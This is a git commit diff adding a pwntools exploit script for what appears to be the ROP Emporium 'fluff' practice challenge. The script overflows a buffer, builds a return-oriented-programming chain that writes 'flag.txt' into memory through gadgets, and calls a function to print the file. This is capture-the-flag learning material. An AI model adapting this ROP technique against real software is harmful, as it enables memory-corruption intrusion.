diff options
author | Brett Weiland <brett_weiland@bpcspace.com> | 2020-12-17 19:39:54 -0600 |
---|---|---|
committer | Brett Weiland <brett_weiland@bpcspace.com> | 2020-12-17 19:39:54 -0600 |
commit | 4c25bd918847e914875e900285008eb3865ca8b6 (patch) | |
tree | 548243b13c540d051c4a47e6ad7021e50eb021ae /x86_64/fluff/exploit.py | |
parent | 3f54969f581fd311c09b1c21758ad9aa4a8784f4 (diff) |
new file: x86_64/fluff/exploit.py
new file: x86_64/fluff/gadgets
Diffstat (limited to 'x86_64/fluff/exploit.py')
-rwxr-xr-x | x86_64/fluff/exploit.py | 49 |
1 files changed, 49 insertions, 0 deletions
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py new file mode 100755 index 0000000..cdf5de8 --- /dev/null +++ b/x86_64/fluff/exploit.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python3 +from pwn import * + +letter_lookups = { + 'f' : 0x00000000004003c4, + 'l' : 0x0000000000400239, + 'a' : 0x00000000004003d6, + 'g' : 0x00000000004003cf, + '.' : 0x0000000000400251, + 't' : 0x0000000000400192, + 'x' : 0x0000000000400246} + +def write_str(dest, string, payload): + payload += p64(0x00000000004006a3) + payload += p64(dest) + for c in string: + payload += p64(0x40062a) + payload += p64(0x4000) # if things go wrong, check endian/order + payload += p64(letter_lookups[c] - 0x3ef2) + + payload += p64(0x0000000000400610) + payload += p64(0) + + payload += p64(0x400628) + + payload += p64(0x400639) + + return(payload) + + +prog = gdb.debug('./fluff', gdbscript=''' +break *pwnme + 151 +''' +) +payload = b'' +for c in range(40): + payload += b'a' + +payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload) +payload += p64(0x00000000004006a3) +payload += p64(0x601be0) # set rdi + +payload += p64(0x0000000000400510) + +payload += b"\n" +prog.sendline(payload) +sleep(1) +print(str(prog.recv(), 'UTF-8')) +prog.interactive() |